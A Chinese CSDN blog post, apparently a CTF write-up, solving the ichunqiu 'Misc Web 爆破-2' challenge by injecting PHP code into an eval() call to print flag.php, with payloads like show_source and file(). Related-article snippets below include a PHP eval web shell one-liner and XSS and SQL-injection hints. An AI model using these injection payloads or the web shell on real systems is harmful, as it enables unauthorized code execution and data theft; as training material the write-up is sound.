ichunqiu Misc Web 爆破2

最新推荐文章于 2021-01-20 18:37:40 发布
最新推荐文章于 2021-01-20 18:37:40 发布
阅读量161 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF writeup 文件包含 文章标签: writeup ichunqiu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45253216/article/details/112425807

承接爆破1。
爆破1中说到,flag在变量里,本题说flag不在变量里,所以考虑文件包含。
文件包含漏洞利用,有几个常用函数,下面一一介绍。
PHP显示函数有两个,show_source 和 highlight_file,这两个可以将PHP代码打印到网页上。
所以第一个思路:把前面的var_dump()闭合,然后显示出flag.php文件。
payload:?hello=);show_source(%27flag.php%27);var_dump(
在这里插入图片描述
执行的代码是:

eval("var_dump();show_source('flag.php');var_dump();");

写第二个var_dump是为了闭合后面的
);")

第二个思路是,通过文件显示函数直接把flag.php的内容输出。
在这里插入图片描述
payload:?hello=file(%27flag.php%27)
%27 是对 ‘ 进行了URL编码。
在这里插入图片描述
在这里插入图片描述
这里把单引号换为双引号,就bool(false)了
emmmm 去问问老师傅怎么回事。
输入的时候,跟单双引号没有关系,主要要对单双引号进行URL编码。
在这里插入图片描述
file()把文件读入一个数组。
file_get_contents()把文件读入一个字符串。
在这里插入图片描述
用file_get_contents()返回一个string(83),得不到flag,可能字符串的格式不能显示出来?

i春秋 CTF misc web爆破-3
一个潜心学习的小白
10-27 2134
题目提示:这个真的是爆破。 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; ...
i春秋CTF训练 Misc Web 爆破-1
椰奶冻不安全的博客
06-19 1203
Misc Web 爆破-1 题目内容:flag就在某六位变量中。 http://8007423c57e9409f94f941eac88ab2157ad7f90842f0497b.changame.ichunqiu.com:80 访问网页得到php代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);")
i春秋CTF训练 Misc Web 爆破-3
椰奶冻不安全的博客
06-30 500
Misc Web 爆破-3 题目内容:这个真的是爆破。 链接需到ichunqiu网站申请 页面显示出源码 <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; } if($_SESSIO
i春秋CTF训练 Misc Web 爆破-2
椰奶冻不安全的博客
06-20 687
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:flag不在变量中。 链接需到ichunqiu网站申请 访问网页得到php代码 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 依旧是通过请求变量hello,再用var_dump()显示,可以考虑文件包含,在url请求flag.
misc web 爆破3
weixin_43345082的博客
08-16 360
i春秋的一道小题 打开就能看见源码 import requests import re url = "http://dd3f4319242241c9acfc17a3302f16713c03d93cb09145ef.changame.ichunqiu.com/?value[]=ea" s=requests.session() r = s.get(url).text print (r[0:2]) f...
[百度杯-二月场] (Misc-Web)爆破-2
qq_41281571的博客
07-29 287
[百度杯-二月场] (Misc-Web)爆破-2 &amp;lt;?php include &quot;flag.php&quot;; $a = @$_REQUEST['hello']; eval( &quot;var_dump($a);&quot;); show_source(__FILE__); 题目知识点: file_get_contents(path)函数,获得指定路径下的文件内容,以字符串的形式返回出来。 eval(str...
网络攻防路2-ichunqiu
大紫明宫空离境
01-04 233
“百度杯”CTF比赛 2017 二月场 1 分值:10分类型:MiscWeb题目名称:爆破-1 题目内容: flag就在某六位变量中。 /?=hello=GOLBALS 2 分值:10分类型:MiscWeb题目名称:爆破-2 题目内容: flag不在变量中。 http://95946c60ed4f4d7f8629d8916bf0db65713ae0849ae6479e.chan...
i春秋web-1
小白的劝退之路
10-16 1144
MISC web 爆破-1 两个’/‘之间的符号是正则表达式,’^’ 表示匹配开始,‘$’匹配结束,‘\w‘表示匹配字母或数字或下划线或汉字,‘*’表示匹配前面的字符0次或多次,使用PHP中的 $GLOBALS变量即可 MISC web 爆破-2 不在变量中,就是在文件中,使用file()或者file_get_contents()或者‘);‘’ ...
分值:10分 类型:MiscWeb题目名称:爆破-1
lynnez_dd的博客
02-22 1007
  竞赛题目:http://14d439b1e955423ebdebb378e0fc9e722aecf253a7984c5c.changame.ichunqiu.com/ 相关writeup: https://www.bugbank.cn/q/article/5a3dda3faf2b5a927faade0d.html     自己的笔记: PHP中$_POST和$_GET的用法 ...
i春秋CTF训练 Web Upload
椰奶冻不安全的博客
06-21 1434
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:想怎么传就怎么传,就是这么任性。 tips:flag在flag.php中 链接需到ichunqiu网站申请 访问网页得到文件上传输入框 明显是文件上传漏洞 方法一:上传木马 上传小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过
百度杯CTF Write up集锦 WEB
热门推荐
4ct10n
09-21 4万+
九月场1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
第十届全国大学生信息安全竞赛-线上赛 write up(持续更新)
csu_vc的博客
09-17 2万+
0x00 WEBPHP execise -web150 这是一道分值150的web题,打开题目链接之后,看到题目界面 可以看到有一处输入的地方可以输入PHP语句 尝试执行以下phpinfo(),这里解释下,phpinfo是一个运行指令,目的为显示php服务器的配置信息。 phpinfo()输出 PHP 当前状态的大量信息,包含了 PHP 编译选项、启用的扩展、PHP 版本、服务器信息
攻防世界 easytornado wp
weixin_45253216的博客
01-19 1837
2021.1.19 不知不觉,1月份都到了19号,感觉一天一道题不太行呀。【狗头】 废话不多说,先写题解,再总结知识点。 题目名叫easytornado,应该是tornado框架的漏洞。 挨个点开看看 看到了/flllllllllag这个文件,估计是flag,但是看到了上面的验证逻辑,有个filehash值,按照格式把文件名的hash值搞出来,emmm看格式应该是MD5,但是不对。 但是别急,一共给了三个文件夹呢。查看第二个welcome.txt 发现了render。百度一波tornado rende
i春秋 XSS闯关 wp
weixin_45253216的博客
01-16 1680
2021.1.16 又是菜鸡划水的一天。 最近看到了一个XSS题目,应该是i春秋这里刚上线的题,之前没有人做,这个属于《从0到1,CTFer成长之路》用来加深对XSS的理解最好不过了。 单击题目进入环境,发现是一个测试XSS的平台,说白了就是弹窗练习。 level1 F12什么都没发现,看到URL通过GET传入username,直接简单搞一波: ?username=<script>alert(1)</script> 果然,第一关就是easy level2 第二关,F12看到
Jsfuck——一个很有意思的Javascript特(附i春秋 broken wp)
weixin_45253216的博客
01-16 1004
简介 WP在后面 jsfuck源于一门编程语言brainfuck,其主要的思想就是只使用8种特定的符号来编写代码。而jsfuck也是沿用了这个思想,它仅仅使用6种符号来编写代码。它们分别是(、)、+、[、]、!。 演示 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![
XCTF favorite_number wp
weixin_45253216的博客
01-14 764
网安菜鸡今天来划水了! CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 题解: 首先打开题目环境,是一种比较熟悉的格式,页面显示一段php源码: <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num=
XCTF NewsCenter wp
weixin_45253216的博客
01-08 460
2021.1.8 网安菜鸡今天来划水了! 很久以前的一道题,因为打开环境一直出错,所以一直拖到现在。CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 打开环境,是一个搜索页面,有一个Search News的搜索框,盲猜sql注入。 在搜索框输入搜索内容,url不变,所以应该是post注入。话不多说,sqlmap安排! First:sqlmap进行POST注入的两种方式 可能有3,4,5种,能力有限,先学两个 方法一:自动搜索表
fakebook writeup sql注入思路
weixin_45253216的博客
01-20 379
2021.1.20 网鼎杯的一道题。 习惯性拿到题目先扫目录 发现了robots.txt。 看到了/user.php.bak这个,应该是源码泄漏。 bak文件可以下载到本地,bak是back-up 备份文件,需要改为对应文件名才能打开,这里就把user.php.bak,改为user.php即可。 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; publi
XCTF mfw wp
weixin_45253216的博客
01-09 374
2021.1.9 网安菜鸡今天来划水了! CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 打开题目,是这样一个界面:欢迎来到我的网站,这是我自己写的。 然后没什么思路,挨个导航栏点击一下看看。 在about页面下,发现了这样有趣的东西: 他告诉我们他用了Git,服务端使用PHP脚本语言,前端框架使用了Bootstrap。 作为一个萌新,当然不知道有Git源码泄漏这个东西,于是乎百度一下。 ...
ctf misc 图片宽高爆破脚本
最新发布
07-13
另外,引用[3]提到Bugku CTF的MISC题目,引用[4]提到i春秋CTF的爆破题,但用户问题集中在图片尺寸爆破,所以我们主要参考引用[2]的脚本。 脚本实现如下(针对PNG图片):</think>### CTF Misc 图片尺寸爆破脚本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值